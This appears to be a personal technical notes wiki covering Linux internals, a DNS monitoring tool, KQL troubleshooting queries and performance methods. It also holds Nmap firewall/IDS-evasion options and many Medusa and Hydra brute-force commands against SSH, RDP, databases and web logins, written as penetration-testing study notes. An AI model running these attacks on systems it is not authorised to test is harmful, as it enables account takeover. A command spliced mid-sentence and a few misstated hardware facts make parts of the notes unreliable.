  • top and ps -eo can be used to view the nice value
  • Default value for nice is 0

IPC

  • How processes talk to each other
  • Also available but used left often, FIFO, semaphores, shared memory
  • Sockets, pipes, signals
  • Pipes exist entirely in memory, no files or disk IO are involved
  • Pipes can only exist between members of the same family in the process tree
  • If you want a pipe between processes that are not in the same process family tree, you can use FIFO, which are a file on the disk mkfifo
  • View all signals with the kill command

Startup and Init

  • Bootstrapping
    • First thing that happens when you power on a system is a positive voltage (5v) is applied to the reset pin of the CPU
    • Two registers are initialized:
      • CS Register: Has the address of the stack
      • EIP Register: The current instruction to execute
    • Load the BIOS from ROM
      • Linux doesn’t use the BIOS after boot, it only uses device drivers loaded by the kernel
      • MSDOS used the BIOS to execute system calls
      • BIOS Steps:
        1. POST (Power on self test)
        2. ACPI - builds tables of devices with information regrading power. Can be used to decide when a system can power down a device or set it to a lower power level
        3. Hardware Initialisation
        • 3 ways to communicate with devices on a PC:
          1. IO port from CPU to the device for communication via a port address
          2. Map memory from the device to the address space of the computer and read/write to it
          3. Use interrupts
        1. Find a boot device by searching for a boot sector on each device.
        • First sector of a disk is the master boot record with contains the partition table and a boot loader (GRUB)

Linux Kernel Development

Building the Linux Kernel

Kernel Modules

Tools

Directory Map

Need to add/refine:

  • Build for multiple platforms

  • Support consumption by other programs via stdout/stderr

  • rename directory structure

    • Example: in getheaders, ./cmd/getHeaders should be ./cmd/cli
  • finish [ ] httpedia [ ] httpbench [ ] crayola [ ] goal? [ ] dnscache [ ] podcrashcollector [ ] dnsfixer [ ] taint-remover [ ] httpstat

instructions for using dnspinger

Before deploying dnsPinger, you will want to create an App Insights workspace.

In this package, you will find a file named env.vars. This file contains a list of environment variables that will be passed to the container:

DNSPINGER_CUSTOM_DIMENSIONS=NodePool=mylaptop;env=local
DNSPINGER_DOMAINS=www.google.com;homedepot.aprimo.com;api.videoindexer.ai
DNSPINGER_REGION=us1
DNSPINGER_RESOLVERS=google=8.8.8.8;opendns=208.67.222.222;azure=168.63.129.16
APPINSIGHTS_INSTRUMENTATIONKEY=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

The following section will explain these environment variables and their usage:

  • DNSPINGER_CUSTOM_DIMENSIONS: A list of semi-colon (;) delimited key-value pairs. In addition to the other environment variables, these are passed to the Log Analytics customEvents table as customDimensions. The idea here was to include the name of the nodepool where this application is running and any other pertinent information.
  • DNSPINGER_DOMAINS: A semi-colon (;) delimited list of domains to resolve.
  • DNSPINGER_REGION: The region where the application is running. We implemented this because (as stated on our call), we are running AKS in 3 regions (Australia East, East US, and West Europe)
  • DNSPINGER_RESOLVERS: A list of semi-colon (;) delimited key-value pairs. The key is the name of a resolver (this is just an arbitrary string used for identification) and the value is the IP address of the resolver
  • APPINSIGHTS_INSTRUMENTATIONKEY: The App Insights instrumentation key where the logs can be uploaded to

You can also view logs by tailing the pod:

Found domain to resolve: www.google.com
[google]        Resolving www.google.com: 142.250.190.36
[opendns]       Resolving www.google.com: 142.250.191.196
[DotnetResolver]        Resolving www.google.com: 172.253.62.103,172.253.62.147,172.253.62.99,172.253.62.104,172.253.62.105,172.253.62.106
[DefaultResolver]       Resolving www.google.com: 172.253.62.103,172.253.62.147,172.253.62.99,172.253.62.104,172.253.62.105,172.253.62.106
Found domain to resolve: homedepot.aprimo.com
[google]        Resolving homedepot.aprimo.com: 52.255.216.147
[opendns]       Resolving homedepot.aprimo.com: 52.255.216.147
[DotnetResolver]        Resolving homedepot.aprimo.com: 52.255.216.147
[DefaultResolver]       Resolving homedepot.aprimo.com: 52.255.216.147
Found domain to resolve: api.videoindexer.ai
[google]        Resolving api.videoindexer.ai: 52.162.125.85
[opendns]       Resolving api.videoindexer.ai: 52.162.125.85
[DotnetResolver]        Resolving api.videoindexer.ai: 168.62.50.75
[DefaultResolver]       Resolving api.videoindexer.ai: 168.62.50.75
Found domain to resolve: www.microsoft.com
[google]        Resolving www.microsoft.com: 184.84.226.4
[opendns]       Resolving www.microsoft.com: 23.78.9.173
[DotnetResolver]        Resolving www.microsoft.com: 104.72.157.175
[DefaultResolver]       Resolving www.microsoft.com: 104.72.157.175
[MessagesSent]  0
[MessagesReceived]      0
[ErrorsSent]    0
[ErrorsReceived]        0
[EchoRequestsSent]      0
[EchoRequestsReceived]  0
[EchoRepliesSent]       0
[EchoRepliesReceived]   0
[DestinationUnreachableMessagesSent]    0
[DestinationUnreachableMessagesReceived]        0
[SourceQuenchesSent]    0
[SourceQuenchesReceived]        0
[RedirectsSent] 0
[RedirectsReceived]     0
[TimeExceededMessagesSent]      0
[TimeExceededMessagesReceived]  0
[ParameterProblemsSent] 0
[ParameterProblemsReceived]     0
[TimestampRequestsSent] 0
[TimestampRequestsReceived]     0
[TimestampRepliesSent]  0
[TimestampRepliesReceived]      0
[AddressMaskRequestsSent]       0
[AddressMaskRequestsReceived]   0
[AddressMaskRepliesSent]        0
[AddressMaskRepliesReceived]    0

You will also see some network statistics in the logs.

To run locally: docker run --env-file ./env.vars rnemethaprimo/dnspinger@latest

To run in Kubernetes: Use the attached deployment.yaml (be sure to update the env vars accordingly)

Some simple LA queries to get you started:

# get all failed queries in the last 10 minutes:

let t = 10m;
customEvents
| where timestamp > ago(t)
| where customDimensions.Success == false

# get log entries for a resolver
customEvents
| where customDimensions.Resolver == "azure"

Nmap

Understanding how Nmap works is critical for interpreting scan results. After confirming a host is alive, scanning helps identify:

  • Open ports & services
  • Service versions
  • Service information
  • Operating system details

Port States (6 Total)

StateMeaning
openTarget accepts connections (TCP/UDP/SCTP).
closedReplies with RST; port reachable but no service.
filteredNo response or error; filtering prevents state determination.
unfilteredOnly in ACK scans; port reachable, state unknown.
open|filteredNo response; likely filtered or silently dropped.
closed|filteredOnly in idle scans; cannot determine closed vs filtered.

TCP Scanning

ACK Scan (-sA)

  • Difficult for firewalls to detect.
  • TCP packet only has the ACK flag set, forcing a RST response from unfiltered ports.
  • Packets with the ACK flag set are usually used to acknowledge received data, so firewalls may not log them as suspicious or block them.

SYN Scan (-sS)

  • Default when running as root.
  • Fast & stealthy (half‑open).
  • Interprets SYN‑ACK -> open, RST -> closed.

Port selection examples

  • -p 22,80,445
  • -p 22-445
  • --top-ports=10
  • -p-
  • -F (top 100)

Packet Tracing (–packet-trace)

Shows packets sent/received.
Example for closed port:

  • SENT: SYN
  • RCVD: RST/ACK -> closed

TCP Connect Scan (-sT)

  • Used when not root.
  • Completes full handshake.
  • Most accurate, least stealthy.
  • Logged by services/IDS.
  • Useful when outbound connections allowed but inbound blocked.

Filtered Ports

Dropped packets:

  • No reply -> Nmap retries (default 10).
  • Slow scan.

Rejected packets:

  • ICMP type 3 code 3 -> port unreachable -> likely firewall rejection.

UDP Scanning (-sU)

  • Slow due to long timeouts.
  • Many ports show open|filtered due to lack of responses.
  • Determining states:
    • UDP response -> open
    • ICMP type 3 code 3 -> closed
    • No response -> open|filtered

Version Detection (-sV)

Probes services to identify:

  • Service name
  • Version
  • Extra metadata (workgroup, hostnames, OS hints)

Example:
Identifies Samba 3.x–4.x on port 445, workgroup WORKGROUP, OS Ubuntu.

nmap looks at the banners of the scanned services and prints them out and uses that to determine the version of the service. If it cannot identify the version through the banner, it will try to identify the service using a signature, but this is extremely noisy.


Key Option Summary

OptionDescription
-PnSkip host discovery.
-nDisable DNS resolution.
--disable-arp-pingSkip ARP ping.
--packet-traceShow packets sent/received.
--reasonExplain port state classification.
-FFast scan (top 100).

Timing

Because such settings cannot always be optimized manually, as in a black-box penetration test, Nmap offers six different timing templates (-T <0-5>) for us to use. These values (0-5) determine the aggressiveness of our scans. This can also have negative effects if the scan is too aggressive, and security systems may block us due to the produced network traffic. The default timing template used when we have defined nothing else is the normal (-T 3).

-T 0 / -T paranoid
-T 1 / -T sneaky
-T 2 / -T polite
-T 3 / -T normal
-T 4 / -T aggressive
-T 5 / -T insane

These templates contain options that we can also set manually, and have seen some of them already. The developers determined the values set for these templates according to their best results, making it easier for us to adapt our scans to the corresponding network environment. The exact used options with their values we can find here: https://nmap.org/book/performance-timing-templates.html

Decoys (-D)

  • Use decoy IP addresses to obfuscate the true source of the scan.
  • Example: nmap -D RND:10 <target> uses 10 random decoys along with the real IP.
  • The decoys must be routable and online from the target’s perspective.
  • Helps evade simple logging and detection mechanisms.
  • Decoys can be used with SYN, ACK, ICMP, and OS Detection scans.

Source Port Specification (–source-port)

  • Specify a different source port for the scan.
  • Example: nmap -sS -Pn -p- --source-port 53 <target>

Firewall/IDS Evasion

  • nmap provides a number of ways to evade firewalls and IDS systems. Including:
  • Fragmentation of packets
  • Decoy IP addresses
  • Using different source ports
  • Randomizing the order of port scans
  • Timing options to slow down scans
  • Using different scan techniques (e.g., Xmas scan, NULL scan)

Core Takeaways

  • Nmap uses 6 port states to categorize behavior.
  • SYN scans are fast & stealthy; connect scans are accurate but noisy.
  • Filtered ports behave differently when dropped vs rejected.
  • UDP scanning is slow and ambiguous.
  • Version detection is essential for deeper enumeration.

Medusa

Medusa is a fast, massively parallel, and modular login brute-forcer designed to support a wide array of services that allow remote authentication. Its primary objective is to enable penetration testers and security professionals to assess the resilience of login systems against brute-force attacks.

Medusa’s key features include:

  • Speed and Parallelism: Utilizes multiple parallel connections to perform brute-force attacks efficiently
  • Modularity: Supports numerous authentication protocols through dedicated modules
  • Flexibility: Can target single hosts or multiple hosts from a file
  • Ease of Use: Straightforward command-line interface with clear syntax

Installation

Medusa often comes pre-installed on popular penetration testing distributions. You can verify its presence by running:

medusa -h

Installing Medusa on a Linux system is straightforward:

sudo apt-get -y update
sudo apt-get -y install medusa

Command Syntax

Medusa’s command-line interface follows this general structure:

medusa [target_options] [credential_options] -M module [module_options]

Target Options

OptionDescriptionExample
-h HOSTSpecify a single target hostname or IP addressmedusa -h 192.168.1.10 ...
-H FILESpecify a file containing a list of targetsmedusa -H targets.txt ...

Credential Options

OptionDescriptionExample
-u USERNAMEProvide a single usernamemedusa -u admin ...
-U FILEProvide a file containing a list of usernamesmedusa -U usernames.txt ...
-p PASSWORDSpecify a single passwordmedusa -p password123 ...
-P FILESpecify a file containing a list of passwordsmedusa -P passwords.txt ...
-e nsCheck for empty passwords (n) and passwords matching username (s)medusa -e ns ...

The -e option is useful for testing weak configurations:

  • -e n: Try empty passwords
  • -e s: Try passwords matching the username
  • -e ns: Try both empty and same-as-username passwords

Attack Options

OptionDescriptionExample
-M MODULEDefine the specific module to use for the attackmedusa -M ssh ...
-m "OPTION"Provide additional parameters required by the chosen modulemedusa -M http -m "POST /login.php..."
-t TASKSDefine the number of parallel login attempts to runmedusa -t 4 ...
-fFast mode: Stop the attack after the first successful login on current hostmedusa -f ...
-FFast mode: Stop the attack after the first successful login on any hostmedusa -F ...
-n PORTSpecify a non-default port for the target servicemedusa -n 2222 ...
-v LEVELVerbose output: Display detailed information (0-6, higher = more verbose)medusa -v 4 ...

Modules

Each module in Medusa is tailored to interact with specific authentication mechanisms, allowing it to send the appropriate requests and interpret responses for successful attacks.

ModuleService/ProtocolDescriptionExample Command
ftpFile Transfer ProtocolBrute-forcing FTP login credentials, used for file transfers over a networkmedusa -M ftp -h 192.168.1.100 -u admin -P passwords.txt
httpHypertext Transfer ProtocolBrute-forcing login forms on web applications over HTTP (GET/POST)medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^
imapInternet Message Access ProtocolBrute-forcing IMAP logins, often used to access email serversmedusa -M imap -h mail.example.com -U users.txt -P passwords.txt
mysqlMySQL DatabaseBrute-forcing MySQL database credentials, commonly used for web applications and databasesmedusa -M mysql -h 192.168.1.100 -u root -P passwords.txt
pop3Post Office Protocol 3Brute-forcing POP3 logins, typically used to retrieve emails from a mail servermedusa -M pop3 -h mail.example.com -U users.txt -P passwords.txt
rdpRemote Desktop ProtocolBrute-forcing RDP logins, commonly used for remote desktop access to Windows systemsmedusa -M rdp -h 192.168.1.100 -u admin -P passwords.txt
sshSecure Shell (SSH)Brute-forcing SSH logins, commonly used for secure remote accessmedusa -M ssh -h 192.168.1.100 -u root -P passwords.txt
svnSubversion (SVN)Brute-forcing Subversion (SVN) repositories for version controlmedusa -M svn -h 192.168.1.100 -u admin -P passwords.txt
telnetTelnet ProtocolBrute-forcing Telnet services for remote command execution on older systemsmedusa -M telnet -h 192.168.1.100 -u admin -P passwords.txt
vncVirtual Network ComputingBrute-forcing VNC login credentials for remote desktop accessmedusa -M vnc -h 192.168.1.100 -P passwords.txt
web-formWeb Login FormsBrute-forcing login forms on websites using HTTP POST requestsmedusa -M web-form -h www.example.com -U users.txt -P passwords.txt -m FORM:"username=^USER^&password=^PASS^:F=Invalid"

Common Usage Examples

SSH Brute-Force Attack

Target a single SSH server with username and password lists:

medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

This command instructs Medusa to:

  • Target the host at 192.168.0.100
  • Use the usernames from the usernames.txt file
  • Test the passwords listed in the passwords.txt file
  • Employ the ssh module for the attack

Multiple Web Servers with Basic HTTP Authentication

Test multiple web servers concurrently:

medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET

In this case, Medusa will:

  • Iterate through the list of web servers in web_servers.txt
  • Use the usernames and passwords provided
  • Employ the http module with the GET method to attempt logins
  • Run multiple threads efficiently checking each server for weak credentials

Testing for Empty or Default Passwords

Assess whether any accounts have empty or default passwords:

medusa -h 10.0.0.5 -U usernames.txt -e ns -M ssh

This command instructs Medusa to:

  • Target the host at 10.0.0.5
  • Use the usernames from usernames.txt
  • Perform additional checks for empty passwords (-e n) and passwords matching the username (-e s)
  • Use the appropriate service module

Medusa will try each username with an empty password and then with the password matching the username, potentially revealing accounts with weak or default configurations.

HTTP POST Form Attack

Attack a web login form using POST requests:

medusa -M http -h www.example.com -U users.txt -P passwords.txt -m "POST /login.php HTTP/1.1\r\nContent-Length: 30\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=^USER^&password=^PASS^"

Custom Port SSH Attack

Target SSH on a non-standard port:

medusa -h 192.168.1.100 -n 2222 -U usernames.txt -P passwords.txt -M ssh

Fast Mode (Stop on First Success)

Stop immediately after finding valid credentials:

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -f

Use -F to stop after first success on any host when targeting multiple hosts.

Verbose Output

Get detailed information about the attack progress:

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -v 4

Higher verbosity levels (up to 6) provide more detailed output.

Parallel Tasks

Control the number of parallel login attempts:

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -t 8

Increasing the number of tasks can speed up the attack but may also increase the risk of detection or overwhelming the target service.


Core Takeaways

  • Medusa uses parallel connections to efficiently brute-force login credentials across multiple protocols
  • Target options (-h or -H) specify hosts, while credential options (-u/-U and -p/-P) specify usernames and passwords
  • The -e option allows testing for weak configurations like empty passwords or passwords matching usernames
  • Module selection (-M) determines which authentication protocol to target
  • Use -f or -F to stop after the first successful login, saving time when valid credentials are found
  • Adjust -t to control parallel threads, balancing speed against detection risk
  • Module options (-m) may be required for complex scenarios like HTTP form attacks

Hydra

Hydra is a fast network login cracker that supports numerous attack protocols. It is a versatile tool that can brute-force a wide range of services, including web applications, remote login services like SSH and FTP, and even databases.

Hydra’s popularity stems from its:

  • Speed and Efficiency: Hydra utilizes parallel connections to perform multiple login attempts simultaneously, significantly speeding up the cracking process.
  • Flexibility: Hydra supports many protocols and services, making it adaptable to various attack scenarios.
  • Ease of Use: Hydra is relatively easy to use despite its power, with a straightforward command-line interface and clear syntax.

Installation

Hydra often comes pre-installed on popular penetration testing distributions. You can verify its presence by running:

hydra -h

If Hydra is not installed or you are using a different Linux distribution, you can install it from the package repository:

sudo apt-get -y update
sudo apt-get -y install hydra

Basic Syntax

Hydra’s basic syntax is:

hydra [login_options] [password_options] [attack_options] [service_options] service://server

Login Options

OptionDescriptionExample
-l LOGINSpecify a single usernamehydra -l admin ...
-L FILESpecify a file containing a list of usernameshydra -L usernames.txt ...

Password Options

OptionDescriptionExample
-p PASSProvide a single passwordhydra -p password123 ...
-P FILEProvide a file containing a list of passwordshydra -P passwords.txt ...
-x MIN:MAX:CHARSETGenerate passwords dynamicallyhydra -x 6:8:aA1 ...

The -x option generates passwords on-the-fly:

  • MIN:MAX specifies the password length range
  • CHARSET defines the character set to use (e.g., a for lowercase, A for uppercase, 1 for numbers)

Attack Options

OptionDescriptionExample
-t TASKSDefine the number of parallel tasks (threads) to run, potentially speeding up the attackhydra -t 4 ...
-fFast mode: Stop the attack after the first successful login is foundhydra -f ...
-s PORTSpecify a non-default port for the target servicehydra -s 2222 ...
-vVerbose output: Display detailed information about the attack’s progresshydra -v ...
-VVery verbose output: Display even more detailed informationhydra -V ...

Hydra Services

Hydra services essentially define the specific protocols or services that Hydra can target. They enable Hydra to interact with different authentication mechanisms used by various systems, applications, and network services. Each module is designed to understand a particular protocol’s communication patterns and authentication requirements, allowing Hydra to send appropriate login requests and interpret the responses.

ServiceProtocolDescriptionExample Command
ftpFile Transfer Protocol (FTP)Used to brute-force login credentials for FTP services, commonly used to transfer files over a networkhydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100
sshSecure Shell (SSH)Targets SSH services to brute-force credentials, commonly used for secure remote login to systemshydra -l root -P /path/to/password_list.txt ssh://192.168.1.100
http-getHTTP GETUsed to brute-force login credentials for HTTP web login forms using GET requestshydra -l admin -P /path/to/password_list.txt http-get://example.com/login
http-postHTTP POSTUsed to brute-force login credentials for HTTP web login forms using POST requestshydra -l admin -P /path/to/password_list.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
smtpSimple Mail Transfer ProtocolAttacks email servers by brute-forcing login credentials for SMTP, commonly used to send emailshydra -l admin -P /path/to/password_list.txt smtp://mail.server.com
pop3Post Office Protocol (POP3)Targets email retrieval services to brute-force credentials for POP3 loginhydra -l user@example.com -P /path/to/password_list.txt pop3://mail.server.com
imapInternet Message Access ProtocolUsed to brute-force credentials for IMAP services, which allow users to access their email remotelyhydra -l user@example.com -P /path/to/password_list.txt imap://mail.server.com
rdpRemote Desktop ProtocolTargets RDP services to brute-force credentials for remote desktop connectionshydra -l administrator -P /path/to/password_list.txt rdp://192.168.1.100
telnetTelnetTargets Telnet services for remote terminal accesshydra -l admin -P /path/to/password_list.txt telnet://192.168.1.100
mysqlMySQLTargets MySQL database servershydra -l root -P /path/to/password_list.txt mysql://192.168.1.100
postgresPostgreSQLTargets PostgreSQL database servershydra -l postgres -P /path/to/password_list.txt postgres://192.168.1.100

HTTP Form-Based Authentication

For HTTP form-based authentication, Hydra uses a specific syntax:

http-post-form "/path/to/login.php:field1=^USER^&field2=^PASS^:failure_string"
  • ^USER^ and ^PASS^ are placeholders that Hydra replaces with actual credentials
  • The failure string (after the second :) helps Hydra identify failed login attempts
  • Use F= prefix for failure strings (e.g., F=incorrect)

Example:

hydra -l admin -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" 192.168.1.100

Password Generation (-x)

The -x option allows Hydra to generate passwords dynamically instead of using a wordlist. This is useful when you have information about password requirements.

Format: -x MIN:MAX:CHARSET

  • MIN: Minimum password length
  • MAX: Maximum password length
  • CHARSET: Character set to use
    • a = lowercase letters
    • A = uppercase letters
    • 1 = numbers
    • Custom character sets can be specified directly

Example: If you know the password is 6-8 characters with lowercase, uppercase, and numbers:

hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 rdp://192.168.1.100

This command instructs Hydra to:

  • Use the username “administrator”
  • Generate and test passwords ranging from 6 to 8 characters
  • Use the specified character set (lowercase, uppercase, numbers)
  • Target the RDP service on 192.168.1.100

Hydra will generate and test all possible password combinations within the specified parameters.


Common Usage Examples

SSH Brute Force

hydra -l root -P /path/to/passwords.txt -t 4 ssh://192.168.1.100

FTP Brute Force with Username List

hydra -L usernames.txt -P passwords.txt ftp://192.168.1.100

HTTP POST Form Attack

hydra -l admin -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" 192.168.1.100

RDP with Password Generation

hydra -l administrator -x 6:8:aA1 rdp://192.168.1.100

SSH on Non-Default Port

hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

Stop After First Success

hydra -l admin -P passwords.txt -f ssh://192.168.1.100

Verbose Output for Debugging

hydra -l admin -P passwords.txt -v ssh://192.168.1.100

Core Takeaways

  • Hydra uses parallel connections to speed up brute-force attacks significantly.
  • Login options (-l or -L) specify usernames, while password options (-p, -P, or -x) specify passwords.
  • The -x option allows dynamic password generation based on length and character set requirements.
  • HTTP form attacks require specific syntax with ^USER^ and ^PASS^ placeholders.
  • Use -f to stop after the first successful login, and -v/-V for detailed output.
  • Adjust -t to control parallel threads, balancing speed against detection risk.

Troubleshooting

Directory Map

Performance Mantras

This is a tuning methodology that shows how best to improve performance, listing actionable items in order from most to least effective.

  1. Don’t do it. (Eliminate unnecessary work)
  2. Do it, but don’t do it again. (caching)
  3. Do it less. (tune refreshes, polling, or updates to be less frequent)
  4. Do it later. (Write-back caching)
  5. Do it when they’re not looking. (schedule work to run off-peak hours)
  6. Do it concurrently. (switch from single to multi-threaded)
  7. Do it more cheaply. (buy faster hardware)

Credits to Scott Emmons @ Netflix

The Problem Statement

Defining the problem statement is a routine task completed as a first step when starting a investigation.

It is characterised as:

  1. What makes you think there is a performance problem?
  2. Has this system ever performed well?
  3. What changed recently? Software? Hardware? Load?
  4. Can the problem be expressed in terms of latency or runtime?
  5. Does the problem affect everyone or a subset of users?
  6. What is the environment? What software and hardware are used? Versions? Configuration?

RED Method

The focus of the RED method is services. Typically, cloud services in a microservices architecture.

It can be summarized as: For every service, check the request rate, errors, and duration per request

The metrics to check are:

  1. Request rate: The number of requests per second
  2. Errors: The number of requests that failed
  3. Duration: The time for requests to completes

USE Method

The utilization, saturation, and errors method should be used early in a performance investigation to identify systemic bottlenecks. It can be summarized as:

  1. For every resource, check utilization, saturation, and errors.

Steps

  1. The first step is to list resources involved (CPUs, RAM, NICs, storage devices, accelerators (GPUs, TPUs, etc.), controllers (storage, network), interconnects)
  2. Once you have a list of resources, consider the metric types available for each az aks nodepool update –resource-group rc-02us1-kubernetes-01-rg –cluster-name rc-02us1-kubernetes-01-cluster –name nplinux02 –labels k8s.aprimo.com/workloadType=scoring –no-wait

Linux

Directory Map

Troubleshooting Memory

File System Paging

File system paging is caused by the reading and writing of of pages in memory-mapped files. When needed, the kernel can free memory by paging some out. If a file system page has been modified in main memory (called dirty), the page out will require it to be written to disk. If, instead, the file system page has not been modified (called clean), the page out simply frees the memory for immediate reuse, since a copy already exists on disk.

Anonymous Paging (swapping)

Anonymous paging involves data that is private to a process; the process heap and stack. It is termed anonymous because it has no named location in the operating system. Anonymous page-outs require moving data to the physical swap locations or swap files. Linux uses the term swapping for this type of paging. Anonymous paging hurts performance and has therefore been referred to as ‘bad paging’. When applications access memory pages that have been paged out, they block on the disk I/O required to read them back to main memory. This is called ‘anonymous page-in’, which introduces latency to applications.

How the operating system deals with memory saturation:

  • Paging
  • Reaping
  • OOM killer

Working Set Size

  • Working Set Size (WSS) is the amount of main memory a process frequently uses to perform work. It is a useful concept for memory perforamnce tuning. Performance should greatly improve if the WSS can fit in the CPU caches, rather than main memory. Also, performance will degrade if the WSS exceeds the amount of main memory, as this additional overhead will involve swapping.

Memory Hardware

  • RAM (Main Memory): Dynamic RAM (DRAM), provides high-density storage; each bit is implemented as a capacitor and a transistor; requires a constant refresh to maintain charge. The access time of RAM can be measured as the column address strobe (CAS) latency. CAS is the time between sending a memory module the desired address to fetch and when the data is available to read. For DDR4 it is around 10-20 nanoseconds.

  • CPU caches

    • Level 1: Usually split into separate instruction and data caches
    • Level 2: A cache for both instructions and data
    • Level 3: Another larger level of cache

MMU (Memory Management Unit)

  • The MMU is response for virtual-to-physical address translations. These are performed per-page, and offsets within a page are mapped directly.

TLB (Translation Lookaside Buffer)

  • The TLB is used by the MMU as the first level of address translation cache, followed by the page table in main memory.

Tools

  • vmstat
  • swapon
  • sar
  • slabtop
  • numastat
  • ps
  • top / htop
  • pmap
  • perf

Troubleshooting Playbook

Directory Map

Troubleshooting 503s for Apps in Kubernetes

Get the precise time of the 503 occurrences

let start = todatetime('2023-11-07T04:25:00Z');
let end = todatetime('2023-11-07T05:00:00Z');
nginxAccessLogs
| where time_iso8601 between (start .. end)
| where host endswith ".aprimo.com"
| where status == 503
| where request_uri has '/api/ui/unauth-init'
| make-series count() default = 0 on time_iso8601 from start to end step 1s by host
| render timechart

Check if there were any pods running during the incident:

let start = todatetime('2023-11-07T04:00:00Z');
let end = todatetime('2023-11-07T05:00:00Z');
let nameprefix = "pod name prefix"
KubePodInventory
| where TimeGenerated between (start .. end)
| where Name contains nameprefix
| make-series count() default = 0 on TimeGenerated from start to end step 1m by PodStatus
| render timechart

General troubleshooting/notes

Get pod names running in a replica set at a given time

let start = todatetime('2023-11-07T04:00:00Z');
let end = todatetime('2023-11-07T05:00:00Z');
let nameprefix = "pod name prefix"
KubePodInventory
| where TimeGenerated between (start .. end)
| where Name startswith nameprefix
| distinct Name

Get node names running during a given time duration:

let start = todatetime('2023-11-07T04:00:00Z');
let end = todatetime('2023-11-07T05:00:00Z');
let nameprefix = "aksnpwin8"
KubeNodeInventory
| where TimeGenerated between (start .. end)
| where Computer startswith nameprefix

Get CPU Utilization Avg Per Microservice

let _ResourceLimitCounterName = 'cpuLimitNanoCores';
let _ResourceUsageCounterName = 'cpuUsageNanoCores';
KubePodInventory
| where Namespace in ('dam-c000', 'pm-r01')
| extend
    InstanceName = strcat(ClusterId, '/', ContainerName),
    ContainerName = strcat(ControllerName, '/', tostring(split(ContainerName, '/')[1]))
| distinct Computer, InstanceName
| join kind=inner hint.strategy=shuffle (
    Perf
    | where ObjectName == 'K8SContainer' and CounterName == _ResourceLimitCounterName
    | summarize MaxLimitValue = max(CounterValue) by Computer, InstanceName, bin(TimeGenerated, _BinSize)
    | project
        Computer,
        InstanceName,
        MaxLimitValue
    )
    on Computer, InstanceName
| join kind=inner hint.strategy=shuffle (
    Perf
    | where ObjectName == 'K8SContainer' and CounterName == _ResourceUsageCounterName
    | project Computer, InstanceName, UsageValue = CounterValue, TimeGenerated
    )
    on Computer, InstanceName
| project
    ContainerName = tostring(split(InstanceName, '/')[10]),
    Computer,
    TimeGenerated,
    UsagePercent = UsageValue * 100.0 / MaxLimitValue
| summarize AvgCPUUsagePercentage = avg(UsagePercent) by bin(TimeGenerated, 1h), ContainerName
| render timechart;

Get Memory Utilization Avg per Microservice

let _ResourceLimitCounterName = 'memoryLimitBytes';
let _ResourceUsageCounterName = 'memoryWorkingSetBytes';
KubePodInventory
| where Namespace in ('dam-c000', 'pm-r01')
| extend InstanceName = strcat(ClusterId, '/', ContainerName),
    ContainerName = strcat(ControllerName, '/', tostring(split(ContainerName, '/')[1]))
| distinct Computer, InstanceName, ContainerName
| join kind=inner hint.strategy=shuffle (
    Perf
    | where ObjectName == 'K8SContainer' and CounterName == _ResourceLimitCounterName
    | summarize MaxLimitValue = max(CounterValue) by Computer, InstanceName, bin(TimeGenerated, 1h)
    | project
        Computer,
        InstanceName,
        MaxLimitValue
    )
    on Computer, InstanceName
| join kind=inner hint.strategy=shuffle (
    Perf
    | where ObjectName == 'K8SContainer' and CounterName == _ResourceUsageCounterName
    | project Computer, InstanceName, UsageValue = CounterValue, TimeGenerated
    )
    on Computer, InstanceName
| project
    AppName = tostring(split(InstanceName, '/')[10]),
    Computer,
    TimeGenerated,
    UsagePercent = UsageValue * 100.0 / MaxLimitValue
| summarize MemoryUsagePercentage = avg(UsagePercent) by bin(TimeGenerated, 1h), AppName
| render timechart;

What Happens When…

Directory Map

What happens when a CPU starts?

  • When a CPU receives power, it resets by receiving a pulse on its RESET (or RST) pin. This is because when the power supply is first powering up, even if it only takes a second or two, the CPU has already received “dirty” power, because the power supply was building up a steady stream of electricity while powering up. Digital logic chips like CPUs require precise voltages, and they get confused if they receive something outside their intended voltage range. This is why the CPU must be reset immediately after powering up. The reset pin must be activated for a certain number of clock cycles to fully reset the CPU.

  • After being reset, the CPU can get to work. The CPU gets some instructions from memory, in what is known as a ‘fetch’ cycle. Memory can be either RAM or ROM. RAM is like the CPUs workbench. ROM stored code that is read-only and controls the system itself. The CPU always fetches code from ROM first so that it knows what its job is. The CPU address memory (both RAM and ROM) through the address bus. The CPU has two buses, the address bus and the data bus. The memory responds to this request from the CPU on the address bus by sending the contents of the selected memory address over the data bus, back to the CPU.

  • Every CPU has a particular point in memory where it begins reading instructions after it has been reset. Some CPUs will jump to a set memory address and begin executing that code. Other CPUs have a ‘reset vector’, which means that it first checks a particular point in memory for a number which is the memory address to begin executing instructions at.

  • The CPU contains a register (internal cache memory, extremely fast) called the instruction pointer, which contains a number. The number in the instruction pointer (IP) is the memory address at which the next instruction is to be performed. The IP is incremented with each instruction, and in the event of a jump (JMP) instruction, which tells the CPU to jump to another location and start running the instructions there, the IP is set to the jump location and then CPU continues on its way from there. The CPU’s instructions are sometimes called “opcodes”. They are simply strings of binary 1s and 0s which together form an instruction. For example, on a standard Intel 80x86 CPU (such as a 486 or Pentium), the opcode 90h (or 10010000 binary) is a NOP (no operation) opcode. NOP is the simplest instruction in any CPU, and it simply means to do nothing and go on to the next instruction. If a cell in RAM or ROM contains this opcode and the CPU executes it, it will perform a NOP (in other words, it will do nothing) and then IP will be set to the next memory cell. (On some computer platforms, the instruction pointer is called the “program counter”, inexplicably abbreviated “PG”. However, on the PC (as in “IBM PC”) platform, the term “instruction pointer” is usually used, because that term is preferred by Intel with regard to its 80x86 CPU family.)

